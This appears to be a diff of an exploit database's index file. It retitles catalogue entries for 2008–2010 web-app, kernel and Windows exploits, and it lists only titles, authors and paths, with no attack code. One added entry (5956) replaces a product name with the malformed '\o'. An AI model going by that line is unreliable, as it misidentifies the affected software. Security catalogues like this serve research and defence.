id,file,description,date,author,platform,type,port 4952,platforms/php/webapps/4952.txt,"boastMachine <= 3.1 - (mail.php id) SQL Injection",2008-01-21,"Virangar Security",php,webapps,0 4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - (id) File Disclosure",2008-01-21,shinmai,php,webapps,0 4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php fileName) File Disclosure",2008-01-21,MhZ91,php,webapps,0 -4955,platforms/php/webapps/4955.txt,"Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities",2008-01-21,QTRinux,php,webapps,0 +4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusion Vulnerabilities",2008-01-21,QTRinux,php,webapps,0 4956,platforms/php/webapps/4956.txt,"AlstraSoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,php,webapps,0 4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x MOIND_ID cookie Bug Remote Exploit",2008-01-21,nonroot,php,webapps,0 4958,platforms/php/webapps/4958.txt,"aflog 1.01 comments.php XSS / SQL Injection",2008-01-22,shinmai,php,webapps,0 @@ -4786,7 +4786,7 @@ id,file,description,date,author,platform,type,port 5146,platforms/php/webapps/5146.txt,"Joomla Component com_clasifier (cat_id) SQL Injection",2008-02-18,S@BUN,php,webapps,0 5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL (cid) Remote SQL Injection",2008-02-18,S@BUN,php,webapps,0 5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics (articleid) Remote SQL Injection",2008-02-18,S@BUN,php,webapps,0 -5149,platforms/php/webapps/5149.txt,"sCssBoard (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0 +5149,platforms/php/webapps/5149.txt,"sCssBoard - (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0 5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - RFI",2008-02-18,Crackers_Child,hardware,remote,0 5151,platforms/osx/dos/5151.pl,"Apple iPhoto 4.0.3 DPAP Server Denial of Service Exploit",2008-02-18,"David Wharton",osx,dos,0 5152,platforms/multiple/dos/5152.sh,"X.Org xorg-server <= 1.1.1-48.13 - Probe for Files Exploit PoC",2008-02-19,vl4dZ,multiple,dos,0 @@ -5028,7 +5028,7 @@ id,file,description,date,author,platform,type,port 5392,platforms/php/webapps/5392.php,"LinPHA <= 1.3.3 - (maps plugin) Remote Command Execution Exploit",2008-04-07,EgiX,php,webapps,0 5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 -5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 +5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - (NeffyLauncher.dll) Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer ActiveX BoF Exploit",2008-04-07,"Patrick Webster",windows,remote,0 @@ -5196,7 +5196,7 @@ id,file,description,date,author,platform,type,port 5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 iso_recv_msg() Integer Underflow PoC",2008-05-08,"Guido Landi",linux,dos,0 5562,platforms/php/webapps/5562.py,"RunCMS <= 1.6.1 - (msg_image) SQL Injection Exploit",2008-05-08,The:Paradox,php,webapps,0 5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow Exploit",2008-05-08,tixxDZ,windows,remote,69 -5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities",2008-05-08,U238,asp,webapps,0 +5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple Remote SQL Injection Vulnerabilities",2008-05-08,U238,asp,webapps,0 5565,platforms/php/webapps/5565.pl,"vShare Youtube Clone 2.6 - (tid) Remote SQL Injection",2008-05-08,Saime,php,webapps,0 5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion Vulnerabilities",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 @@ -5560,7 +5560,7 @@ id,file,description,date,author,platform,type,port 5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) Remote SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 5938,platforms/php/webapps/5938.php,"PHPmotion <= 2.0 - (update_profile.php) Remote Shell Upload Exploit",2008-06-25,EgiX,php,webapps,0 5939,platforms/php/webapps/5939.txt,"Joomla Component netinvoice 1.2.0 SP1 SQL Injection",2008-06-25,His0k4,php,webapps,0 -5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0 +5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0 5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 - (SQL/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 - (category) SQL Injection",2008-06-26,boom3rang,php,webapps,0 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0 @@ -5574,7 +5574,7 @@ id,file,description,date,author,platform,type,port 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0 -5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0 +5956,platforms/php/webapps/5956.txt,"\o - Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0 5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0 5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0 @@ -5718,7 +5718,7 @@ id,file,description,date,author,platform,type,port 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) Remote SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 -6105,platforms/asp/webapps/6105.pl,"HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 +6105,platforms/asp/webapps/6105.pl,"HRS Multi - (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (Perl)",2008-07-21,"Guido Landi",windows,local,0 6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 - (help.php) LFI Vulnerabilities",2008-07-21,DSecRG,php,webapps,0 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Remote Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 @@ -6402,7 +6402,7 @@ id,file,description,date,author,platform,type,port 6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - (LIST) Remote Denial of Service Exploit",2008-10-24,"Alfons Luja",windows,dos,0 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0 -6837,platforms/php/webapps/6837.txt,"Kasra CMS (index.php) Multiple SQL Injection Vulnerabilities",2008-10-25,G4N0K,php,webapps,0 +6837,platforms/php/webapps/6837.txt,"Kasra CMS - (index.php) Multiple SQL Injection Vulnerabilities",2008-10-25,G4N0K,php,webapps,0 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service Exploit (Metasploit)",2008-10-25,"Saint Patrick",windows,dos,0 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - (gotourl.php id) SQL Injection",2008-10-26,"Hussin X",php,webapps,0 6840,platforms/windows/remote/6840.html,"PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 @@ -7984,7 +7984,7 @@ id,file,description,date,author,platform,type,port 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection",2009-04-17,HCOCA_MAN,php,webapps,0 -8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0 +8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Shell Upload",2009-04-20,JosS,php,webapps,0 @@ -8061,7 +8061,7 @@ id,file,description,date,author,platform,type,port 8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure",2009-04-27,SirGod,php,webapps,0 -8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 +8556,platforms/linux/remote/8556.c,"Linux Kernel <= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0 8559,platforms/php/webapps/8559.c,"webSPELL <= 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0 @@ -8252,7 +8252,7 @@ id,file,description,date,author,platform,type,port 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher Arbitrary Auth Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Remote Blind SQL Injection",2009-05-20,snakespc,php,webapps,0 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Remote Arbitrary Remove Projects/Tasks Vulnerabilities",2009-05-20,YEnH4ckEr,php,webapps,0 -8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (Updated)",2009-05-20,"Landon Fuller",osx,remote,0 +8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0 8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Auth Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0 8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar - (SQL/XSS) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 @@ -8268,7 +8268,7 @@ id,file,description,date,author,platform,type,port 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0 8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) Remote SQL Injection",2009-05-22,Qabandi,php,webapps,0 8770,platforms/windows/local/8770.py,"Winamp <= 5.55 - (MAKI script) Universal Seh Overwrite Exploit",2009-05-22,His0k4,windows,local,0 -8771,platforms/php/webapps/8771.htm,"ZaoCMS (user_updated.php) Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0 +8771,platforms/php/webapps/8771.htm,"ZaoCMS - (user_updated.php) Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0 8772,platforms/windows/local/8772.pl,"Winamp <= 5.55 - (MAKI script) Universal Integer Overflow Exploit",2009-05-22,"Encrypt3d.M!nd ",windows,local,0 8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) - Arbitrary Remote File Upload",2009-05-22,Qabandi,php,webapps,0 8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit",2009-05-22,G4N0K,php,webapps,0 @@ -8290,7 +8290,7 @@ id,file,description,date,author,platform,type,port 8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion Exploit",2009-05-26,StAkeR,php,webapps,0 8791,platforms/php/webapps/8791.txt,"WordPress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0 8792,platforms/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion Vulnerabilities",2009-05-26,asL-Sabia,php,webapps,0 -8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0 +8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script - (Admin Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0 8794,platforms/multiple/dos/8794.htm,"Mozilla Firefox (unclamped loop) Denial of Service Exploit",2009-05-26,"Thierry Zoller",multiple,dos,0 8795,platforms/php/webapps/8795.htm,"Ultimate Media Script 2.0 - Remote Change Content Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0 8796,platforms/php/webapps/8796.htm,"Gallarific (user.php) Arbirary Change Admin Information Exploit",2009-05-26,TiGeR-Dz,php,webapps,0 @@ -8701,7 +8701,7 @@ id,file,description,date,author,platform,type,port 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0 9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 (Auth Bypass) - SQL Injection",2009-07-21,n3w7u,php,webapps,0 -9226,platforms/php/webapps/9226.txt,"phpdirectorysource (XSS/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 +9226,platforms/php/webapps/9226.txt,"phpdirectorysource - (XSS/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0 9228,platforms/windows/dos/9228.pl,"otsAV 1.77.001 - (.ofl) Local Heap Overflow PoC",2009-07-22,hack4love,windows,dos,0 9229,platforms/windows/local/9229.py,"WINMOD 1.4 - (.lst) Universal Buffer Overflow Exploit (SEH) (2)",2009-07-22,Dz_Girl,windows,local,0 @@ -8715,7 +8715,7 @@ id,file,description,date,author,platform,type,port 9240,platforms/windows/dos/9240.py,"OpenH323 Opal SIP Protocol Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9241,platforms/windows/dos/9241.py,"Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9242,platforms/windows/dos/9242.py,"WzdFTPD <= 8.0 - Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0 -9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum (SQL/XSS) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0 +9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - (SQL/XSS) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0 9244,platforms/php/webapps/9244.txt,"Joomla Extension UIajaxIM 1.1 JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 9245,platforms/php/webapps/9245.pl,"PHP Live! 3.2.1/2 - (x) Remote Blind SQL Injection Exploit",2009-07-24,skys,php,webapps,0 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0 @@ -8734,7 +8734,7 @@ id,file,description,date,author,platform,type,port 9259,platforms/php/webapps/9259.txt,"almond classifieds ads - (bSQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9260,platforms/php/webapps/9260.txt,"skadate dating - (RFI/LFI/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9261,platforms/php/webapps/9261.txt,"xoops celepar module qas - (bSQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9262,platforms/php/webapps/9262.txt,"garagesalesjunkie (SQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 +9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - (SQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9263,platforms/php/webapps/9263.txt,"URA 3.0 - (cat) Remote SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0 9264,platforms/linux/dos/9264.py,"stftp <= 1.10 - (PWD Response) Remote Stack Overflow PoC",2009-07-27,sqlevil,linux,dos,0 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0 @@ -8809,7 +8809,7 @@ id,file,description,date,author,platform,type,port 9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0 9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0 9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0 -9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher (bSQL-XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 +9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - (bSQL/XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - (bSQL/XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Auth Bypass) Remote SQL Injection",2009-08-03,snakespc,php,webapps,0 @@ -8848,7 +8848,7 @@ id,file,description,date,author,platform,type,port 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 - (.m3u) Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0 9376,platforms/windows/dos/9376.py,"jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - (.m3u /m3l) Universal Local BoF Exploit (SEH)",2009-08-06,hack4love,windows,local,0 -9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 +9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 9379,platforms/windows/local/9379.pl,"Playlistmaker 1.5 - (.M3U/M3L) Local Stack Overflow Exploit (seh)",2009-08-06,germaya_x,windows,local,0 9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) Remote SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 9381,platforms/windows/dos/9381.py,"Groovy Media Player 1.2.0 - (.m3u) Local Buffer Overflow PoC",2009-08-06,"opt!x hacker",windows,dos,0 @@ -8940,10 +8940,10 @@ id,file,description,date,author,platform,type,port 9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - Remote SQL Injection Exploit",2009-08-18,"Jafer Al Zidjali",php,webapps,0 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,php,webapps,0 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0 -9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0 +9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0 -9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0 +9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) Remote SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0 9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - (.psh) Universal BoF Exploit XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0 @@ -9007,7 +9007,7 @@ id,file,description,date,author,platform,type,port 9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0 9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2)",2009-08-31,"Jon Oberheide",linux,local,0 9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 -9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0 +9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - 'sock_sendpage()' Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 - (.M3U) Local Buffer Overflow PoC",2009-08-31,hack4love,windows,dos,0 9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server <= 9.2.0.111 - Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0 9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b (.m3u/upl) Universal Local BoF Exploit (SEH)",2009-08-31,hack4love,windows,local,0 @@ -10600,7 +10600,7 @@ id,file,description,date,author,platform,type,port 11585,platforms/php/webapps/11585.txt,"phpCDB <= 1.0 - Local File Include",2010-02-27,"cr4wl3r ",php,webapps,0 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK <= 1.0.1 - SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 11587,platforms/php/webapps/11587.txt,"ProMan <= 0.1.1 - Multiple File Include",2010-02-27,"cr4wl3r ",php,webapps,0 -11588,platforms/php/webapps/11588.txt,"phpMySite (XSS/SQLi) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0 +11588,platforms/php/webapps/11588.txt,"phpMySite - (XSS/SQLi) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings SQL Injection",2010-02-27,Crux,asp,webapps,0 11590,platforms/multiple/dos/11590.php,"Mozilla Firefox <= 3.6 - Denial of Service Exploit",2010-02-27,Ale46,multiple,dos,0 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory SQL Injection",2010-02-27,Crux,php,webapps,0 @@ -10653,7 +10653,7 @@ id,file,description,date,author,platform,type,port 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php (id) SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 -11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.x / 1.7.x (<= 1.6.9p21 / <= 1.7.2p4) - Local Root Exploit",2010-03-07,kingcope,multiple,local,0 +11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' (id) news.php - SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include",2010-03-08,"cr4wl3r ",php,webapps,0 @@ -10774,7 +10774,7 @@ id,file,description,date,author,platform,type,port 11780,platforms/php/webapps/11780.html,"Clain_TIger_CMS CSRF",2010-03-17,"pratul agrawal",php,webapps,0 11781,platforms/php/webapps/11781.html,"chilly_CMS CSRF",2010-03-17,"pratul agrawal",php,webapps,0 11782,platforms/php/webapps/11782.txt,"Joomla Component com_include SQL Injection",2010-03-17,"DevilZ TM",php,webapps,0 -11783,platforms/php/webapps/11783.txt,"Preisschlacht Multi Liveshop System SQL Injection (seite&aid) index.php",2010-03-17,"Easy Laster",php,webapps,0 +11783,platforms/php/webapps/11783.txt,"Preisschlacht Multi Liveshop System - SQL Injection (seite&aid) index.php",2010-03-17,"Easy 